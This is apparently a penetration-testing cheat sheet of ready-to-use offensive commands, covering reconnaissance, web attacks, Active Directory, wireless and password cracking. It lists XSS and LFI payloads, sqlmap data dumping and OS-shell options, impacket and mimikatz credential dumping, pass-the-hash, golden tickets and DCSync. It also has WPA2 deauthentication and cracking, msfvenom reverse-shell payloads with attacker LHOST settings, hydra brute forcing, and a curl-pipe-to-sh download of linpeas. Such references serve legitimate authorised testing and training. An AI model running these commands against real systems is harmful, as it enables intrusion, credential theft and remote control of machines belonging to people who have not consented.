Tools Cheatsheet
Table of Contents
- Reconnaissance
- Web Application Testing
- Network Attacks
- Privilege Escalation
- Active Directory
- Wireless
- Forensics & Reverse Engineering
- Exploitation
- Password Attacks
Reconnaissance
Nmap
bash
# Host discovery
nmap -sn 10.0.0.0/24 # Ping sweep
nmap -PS22,80,443 10.0.0.0/24 # SYN ping
nmap -sV -sC -p- 10.0.0.5 -oA scan # Full scan with scripts
# Scan types
nmap -sT 10.0.0.5 # TCP connect (logged)
nmap -sS 10.0.0.5 # SYN scan (stealthier)
nmap -sU 10.0.0.5 # UDP scan
nmap -sN 10.0.0.5 # Null scan
nmap -sF 10.0.0.5 # FIN scan
# Output
nmap -oA scan 10.0.0.5 # All formats
nmap -oN scan.nmap 10.0.0.5
nmap -oX scan.xml 10.0.0.5
# Timing (faster = noisier)
nmap -T4 10.0.0.5 # Aggressive (local nets)
nmap -T0 10.0.0.5 # Paranoid (IDS evasion)DNS Enum
bash
dig example.com A MX NS TXT AXFR
dig +short -x 1.2.3.4
dnsenum example.com
dnsrecon -d example.com
fierce -dns example.com
amass enum -passive -d example.com
subfinder -d example.comWeb Recon
bash
whatweb example.com
nikto -h http://example.com
gobuster dir -u http://example.com -w wordlist.txt
ffuf -w wordlist.txt -u http://example.com/FUZZ
dirb http://example.com/Web Application Testing
Burp Suite
Proxy → Intercept — Capture/modify requests
Proxy → HTTP History — All captured traffic
Target → Site Map — Discovered endpoints
Intruder → Positions — Fuzzing (Sniper, Pitchfork, Cluster Bomb)
Repeater — Manual request testing
Decoder — Encode/decode/hashSQLMap
bash
sqlmap -u "http://example.com/?id=1" # Basic
sqlmap -u "http://example.com/" --data="u=p" # POST
sqlmap -u "http://example.com/" --cookie="sess=1"
sqlmap -u "http://example.com/?id=1" --dbs # List DBs
sqlmap -u "http://example.com/?id=1" --dump # Dump data
sqlmap -u "http://example.com/" --os-shell # OS shell
sqlmap -u "http://example.com/" --batch # Non-interactiveXSS Payloads
javascript
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe src="javascript:alert('XSS')">
<a href="javascript:alert('XSS')">click</a>LFI Payloads
../../etc/passwd
..%252f..%252f..%252fetc/passwd
/proc/self/environ
/proc/net/tcpNetwork Attacks
SMB
bash
# Null session
smbclient -L //10.0.0.5 -N
enum4linux -a 10.0.0.5
# impacket
python3 GetNPUsers.py domain/ -usersfile users.txt
python3 GetUserSPNs.py domain/user:pass -outputfile spn_hashes.txt
python3 secretsdump.py domain/user:pass@10.0.0.5
python3 psexec.py domain/user:pass@10.0.0.5
python3 wmiexec.py domain/user:pass@10.0.0.5Pass-the-Hash
bash
# Metasploit
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:HASH
# CrackMapExec / NetExec
cme smb 10.0.0.5 -u administrator -H "HASH" -x "whoami"Responder / Relay
bash
responder -I eth0 -dwv
ntlmrelayx.py -tf targets.txt -smb2supportPrivilege Escalation
Linux
bash
# Find SUID
find / -perm -4000 -type f 2>/dev/null
# Sudo exploits
sudo -l
# Check GTFOBins: https://gtfobins.github.io/
# Enumeration scripts
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
./linpeas.sh
# Kernel exploits
searchsploit "Linux Kernel"
uname -aWindows
powershell
# Enumeration
whoami /all
whoami /priv
systeminfo
wmic qfe
# Scripts
.\winPEASany.exe quiet fast
.\Seatbelt.exe -group=user
# Token impersonation
.\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami"
.\PrintSpoofer.exe -c "whoami"
# Check SeImpersonatePrivilege
whoami /priv | findstr "Impersonate"Active Directory
Kerberos
bash
# AS-REP Roasting
python3 GetNPUsers.py domain/ -usersfile users.txt -format hashcat -o hashes.txt
hashcat -m 18200 hashes.txt wordlist.txt
# Kerberoasting
python3 GetUserSPNs.py domain/user:pass -outputfile spn_hashes.txt
hashcat -m 13100 spn_hashes.txt wordlist.txt
# Golden Ticket
mimikatz # kerberos::golden /domain:DOMAIN /sid:SID /krbtgt:HASH /user:Administrator /ticket:golden.kirbi
# DCSync
mimikatz # lsadump::dcsync /domain:DOMAIN /user:krbtgt
python3 secretsdump.py domain/user:pass@dc.domain.comBloodHound
bash
python3 bloodhound.py -c All -u user@domain -p password -d domain -dc 10.0.0.5
# Or on Windows with Sharphound
. Sharphound.ps1 -CollectionMethods All
# Analyze in BloodHound GUIWireless
WPA2
bash
# Monitor mode
airmon-ng start wlan0
# Discover networks
airodump-ng wlan0mon
airodump-ng wlan0mon --bssid MAC -c CHANNEL -w capture
# Deauth
aireplay-ng wlan0mon -0 5 -a AP_MAC -c CLIENT_MAC
# Capture handshake
aircrack-ng capture.cap -w wordlist.txt
# PMKID
hcxdumptool -i wlan0mon -o pmkid.pcapng
hcxpcaptool -z pmkid_hashes.txt pmkid.pcapng
hashcat -m 16800 pmkid_hashes.txt wordlist.txtForensics & Reverse Engineering
File Analysis
bash
file filename
binwalk filename
binwalk -e filename
foremost -i filename -o output
strings filename | grep -i flag
exiftool filenameMemory Forensics
bash
python3 vol.py -f memory.dmp windows.info
python3 vol.py -f memory.dmp windows.pslist
python3 vol.py -f memory.dmp windows.malfind
python3 vol.py -f memory.dmp windows.hashdumpGDB / Pwndbg
bash
gdb ./binary
pwndbg ./binary
# Commands:
run # Execute
break *0xaddress # Set breakpoint
nexti / stepi # Step
info registers # Registers
x/100x $rsp # Examine stackExploitation
Metasploit
bash
msfconsole
search exploit_name
use module_number
show options
set RHOSTS 10.0.0.5
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 10.0.0.4
set LPORT 443
runmsfvenom
bash
# Payloads
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=IP LPORT=443 -f exe -o shell.exe
msfvenom -p linux/x86/shell_reverse_tcp LHOST=IP LPORT=443 -f elf -o shell.elf
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=443 -f war -o shell.war
# Staged vs Stageless
-p windows/x64/meterpreter/reverse_tcp # Staged (meterpreter loaded in stages)
-p windows/x64/meterpreter_reverse_tcp # Stageless (all in one)pwntools
python
from pwn import *
context.update(arch='i386', os='linux')
p = remote('target', port)
# or
p = process('./binary')
# Interaction
p.sendline(b'payload')
p.recvline()
p.interactive()
# GDB debugging
gdb.attach(p, '''
break *0xaddress
continue
''')Password Attacks
Hashcat
bash
# Modes
-m 0 MD5
-m 100 SHA1
-m 1400 SHA256
-m 1700 SHA512
-m 5600 NetNTLMv2
-m 13100 Kerberos TGS (Kerberoast)
-m 18200 AS-REP (AS-REP roast)
-m 2500 WPA2 handshake
-m 16800 PMKID
# Examples
hashcat -m 0 hash.txt wordlist.txt
hashcat -m 2500 handshake.hccapx wordlist.txt
hashcat -m 13100 spn_hashes.txt wordlist.txt -r rules/best64.ruleHydra
bash
hydra -l user -P passwords.txt ssh://10.0.0.5
hydra -l admin -P passwords.txt rdp://10.0.0.5
hydra -L users.txt -P passwords.txt 10.0.0.5 smb
hydra -l user -P passwords.txt 10.0.0.5 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"John the Ripper
bash
john --wordlist=wordlist.txt hashes.txt
john --rules --wordlist=wordlist.txt hashes.txt
john --show hashes.txt
# Format detection
john --list=formats | grep -i md5Quick Reference
| Port | Service | Key Tool |
|---|---|---|
| 21 | FTP | hydra, msfconsole |
| 22 | SSH | hydra, ssh |
| 23 | Telnet | hydra |
| 25 | SMTP | hydra, send-email |
| 53 | DNS | dig, nslookup |
| 80/443 | HTTP/S | Burp, SQLMap, ffuf |
| 135 | RPC | rpcclient, impacket |
| 139/445 | SMB | enum4linux, impacket |
| 1433 | MSSQL | sqsh, impacket |
| 3306 | MySQL | mysql, sqlmap |
| 3389 | RDP | xfreerdp, hydra |
| 5432 | PostgreSQL | psql, sqlmap |
| 5985/5986 | WinRM | evil-winrm, hydra |
| 6379 | Redis | redis-cli |
| 8080 | HTTP Alt | Burp, SQLMap |
| 27017 | MongoDB | mongosh |